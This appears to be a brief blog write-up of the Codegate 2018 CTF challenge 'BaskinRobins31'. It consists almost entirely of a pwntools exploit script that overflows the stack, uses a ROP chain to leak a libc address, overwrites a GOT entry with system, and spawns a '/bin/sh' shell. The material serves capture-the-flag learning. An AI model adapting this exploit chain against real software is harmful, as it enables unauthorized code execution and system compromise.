codegate2018 - BaskinRobins31
2018. 10. 31. 15:37ㆍCTF's Write-up
It's been a while since I've posted on the blog, haha.
This is BaskinRobins31.
```python
# Python 2 / pwntools
from pwn import *

r = process("./BaskinRobins31")
e = ELF("./BaskinRobins31")
l = e.libc

write_plt = e.plt["write"]
write_got = e.got["write"]
read_plt = e.plt["read"]
read_got = e.got["read"]
bss = e.bss() + 16
shell = "/bin/sh"

pop_rdi_rsi_rdx = 0x000000000040087a
pop_rdi = 0x0000000000400bc3

# 184 bytes of padding before the chain that replaces the return address
pay = "A" * 184

tmp = r.recv()
print tmp

# read(0, bss, 8): store the "/bin/sh" string in .bss
pay += p64(pop_rdi_rsi_rdx) + p64(0) + p64(bss) + p64(8) + p64(read_plt)
# write(1, read_got, 8): leak the resolved libc address of read
pay += p64(pop_rdi_rsi_rdx) + p64(1) + p64(read_got) + p64(8) + p64(write_plt)
# read(0, read_got, 8): overwrite read's GOT entry
pay += p64(pop_rdi_rsi_rdx) + p64(0) + p64(read_got) + p64(8) + p64(read_plt)
# read@plt(bss): after the overwrite this calls system("/bin/sh")
pay += p64(pop_rdi) + p64(bss) + p64(read_plt)
r.send(pay)
sleep(1)

r.recvuntil("Don't break the rules...:( \n")
r.send(shell)

add = u64(r.recv(8))
print(hex(add))

# Despite the name, this is system's address: leaked read - read offset + system offset
offset = add - l.symbols['read'] + l.symbols['system']
r.send(p64(offset))

r.interactive()
```